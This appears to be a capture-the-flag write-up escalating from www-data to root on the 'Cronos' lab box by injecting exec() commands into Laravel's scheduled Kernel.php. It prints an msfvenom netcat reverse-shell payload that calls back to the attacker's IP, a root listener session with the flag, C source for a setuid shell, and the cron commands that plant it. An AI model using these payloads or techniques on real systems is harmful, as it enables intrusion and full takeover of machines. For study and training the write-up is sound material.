www-data@cronos:/var/www/laravel$ find / -name Kernel.php 2>/dev/null
find / -name Kernel.php 2>/dev/null
/var/www/laravel/app/Console/Kernel.php
/var/www/laravel/app/Http/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Foundation/Console/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Contracts/Console/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Contracts/Http/Kernel.php
/var/www/laravel/vendor/symfony/http-kernel/Kernel.php
www-data@cronos:/var/www/laravel$ cd app
cd app
www-data@cronos:/var/www/laravel/app$ cd Console
cd Console
www-data@cronos:/var/www/laravel/app/Console$ vi Kernel.php
vi Kernel.php


www-data@cronos:/var/www/laravel/app/Console$ cat Kernel.php
cat Kernel.php
<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}
www-data@cronos:/var/www/laravel/app/Console$ 

 

In the middle of the code above, the schedule() method is where scheduled commands go:

    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

Adding an exec() entry there should be enough:

    protected function schedule(Schedule $schedule)
    {
        $schedule->exec('touch /dev/shm/taku/test')->everyMinute();
        // $schedule->command('inspire')
        //          ->hourly();
    }

 

 

vi is available on the target, but the raw netcat shell is not a proper terminal, so the editor draws garbage characters and normal editing is impossible.

I tried changing the terminal type and a few other things without luck and nearly gave up, but there is a way.

One caveat: if the host side is running zsh (the default shell since Kali 2021) this procedure throws errors, so switch to bash first.

On the target, spawn bash via python (python -c 'import pty;pty.spawn("/bin/bash")'), then press Ctrl+Z to background the shell.

Back at the host terminal, type stty raw -echo, then fg and Enter to bring the shell back to the foreground. Editing in vi now works (set TERM=xterm on the target if it still complains).

Now test that the scheduled command really executes.

I created a taku directory under /dev/shm and told the schedule to create a file named test in it.

After a minute the job has run and the file exists, owned by root:

 

www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rw-r--r-- 1 root     root         0 Apr 21 12:00 test

 

 

From here there are several ways to turn that into root.

First option, a reverse shell: build an nc payload with msfvenom and start a listener.

 

──(root💀takudaddy)-[~]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.13 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/samnj; nc 10.10.14.13 8989 0</tmp/samnj | /bin/sh >/tmp/samnj 2>&1; rm /tmp/samnj

 

 

Put the generated payload into Kernel.php as the exec() command and wait a minute:

┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvnp 8989                                                                   
listening on [any] 8989 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53900
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root/txt
cat: /root/root/txt: No such file or directory
cd /root
cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0

 

 

 

 

 

Another way is a setuid helper: create a small program that spawns a shell, have the cron job chown it to root and set the suid bit, then run it. There is no gcc on the target, though, so it cannot be compiled there.

uname -a showed an x86_64 kernel, so write and compile the code on the attacking machine, download the binary to the target, and continue from there.

┌──(root💀takudaddy)-[/var/www/html]
└─# cat takudaddy.c
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Meant to run as a root-owned setuid binary: make the real uid/gid 0 as well
 * (so the spawned bash does not drop privileges), then hand over a shell. */
int main(void) {
        setuid(0);
        setgid(0);
        system("/bin/bash");
        return 0;
}

gcc -o takuattack takudaddy.c



www-data@cronos:/dev/shm/taku$ wget http://10.10.14.13/takuattack
--2021-04-21 12:09:21--  http://10.10.14.13/takuattack
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16712 (16K)
Saving to: 'takuattack'

takuattack          100%[===================>]  16.32K  79.9KB/s    in 0.2s    

2021-04-21 12:09:22 (79.9 KB/s) - 'takuattack' saved [16712/16712]



www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rwxr-xr-x 1 www-data www-data 16712 Apr 21 09:44 takuattack
-rw-r--r-- 1 root     root         0 Apr 21 12:00 test
www-data@cronos:/dev/shm/taku$ chmod +x takuattack
www-data@cronos:/dev/shm/taku$ ./takuattack




Running it now only gives a www-data shell, since the file is still ours. Update the Kernel.php command so root takes ownership and sets the suid bit:
$schedule->exec('chown root:root /dev/shm/taku/takuattack; chmod 4755 /dev/shm/taku/takuattack')->everyMinute();




www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rwsr-xr-x 1 root root 16712 Apr 21 09:44 takuattack
-rw-r--r-- 1 root root     0 Apr 21 12:00 test

 

The ownership and permissions of takuattack changed as intended. Running it should now give root, but it does not. Why?

Running mount and checking the filesystem under /dev/shm shows it is mounted nosuid: reads and writes are fine, but the kernel ignores the setuid bit on anything stored there.

=> tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

The root filesystem carries no such restriction, so moving the file to /tmp (which lives on /) and running it again should work.

=> /dev/mapper/cronos--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
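Checking this before the cron job fires saves a minute per attempt. The script below is an added example, not from the original post: it parses `mount` output lines (the two quoted above plus a constructed /run line for illustration), resolves a path to its mount point by longest-prefix match, and reports whether a root-owned 4755 file at that path would actually run with root privileges. On a live box the same logic can be pointed at /proc/self/mounts.

```python
"""Would a setuid binary at this path be honoured? (added example, not the post's code)

Parses `mount` output, finds the mount governing a path (longest prefix wins)
and checks it for nosuid / noexec, which the kernel applies regardless of the
file's mode bits.
"""
import re

# Sample input: the two mount lines quoted on this page, plus a constructed
# /run line to show a mount that is both nosuid and noexec.
MOUNT_OUTPUT = """\
/dev/mapper/cronos--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime)
"""

MOUNT_RE = re.compile(r"^(\S+) on (\S+) type (\S+) \((.*)\)$")


def parse_mounts(text):
    """Return a list of (mountpoint, fstype, set-of-options) from `mount` output."""
    mounts = []
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            _src, mnt, fstype, opts = m.groups()
            mounts.append((mnt, fstype, set(opts.split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest mount point that is a prefix of path ('/' matches everything)."""
    best = None
    for mnt, fstype, opts in mounts:
        if path == mnt or path.startswith(mnt.rstrip("/") + "/"):
            if best is None or len(mnt) > len(best[0]):
                best = (mnt, fstype, opts)
    return best


def suid_usable(path, mounts):
    """True if a root-owned mode-4755 file at `path` would run with root privileges."""
    mnt = mount_for(path, mounts)
    if mnt is None:
        return False
    _, _, opts = mnt
    return not ({"nosuid", "noexec"} & opts)


if __name__ == "__main__":
    mounts = parse_mounts(MOUNT_OUTPUT)
    for p in ("/dev/shm/taku/takuattack", "/tmp/takuattack", "/run/x"):
        mnt = mount_for(p, mounts)
        print("%-26s -> %-8s suid usable: %s" % (p, mnt[0], suid_usable(p, mounts)))
```

/dev/shm/taku/takuattack resolves to the nosuid tmpfs and is reported unusable; /tmp/takuattack falls through to the ext4 root and is usable, which is why the move below fixes it.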

 

 

 

Kernel.php edited accordingly:
$schedule->exec('mv /dev/shm/taku/takuattack /tmp/takuattack; chown root:root /tmp/takuattack ; chmod 4755 /tmp/takuattack')->everyMinute();

After waiting a minute, /tmp contains:

www-data@cronos:/tmp$ ls -l
total 56
-rwsr-xr-x 1 root     root     16712 Apr 21 09:44 takuattack
drwx------ 3 root     root      4096 Apr 20 15:55 systemd-private-2f7fbbc00f9d45a4881e19e3d987ab74-systemd-timesyncd.service-KJRlWo
drwx------ 2 root     root      4096 Apr 20 15:55 vmware-root

The file was moved with the intended owner and mode. Running it:


www-data@cronos:/tmp$ ./takuattack
root@cronos:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@cronos:/tmp# whoami
root

Root.

 

 

 

 
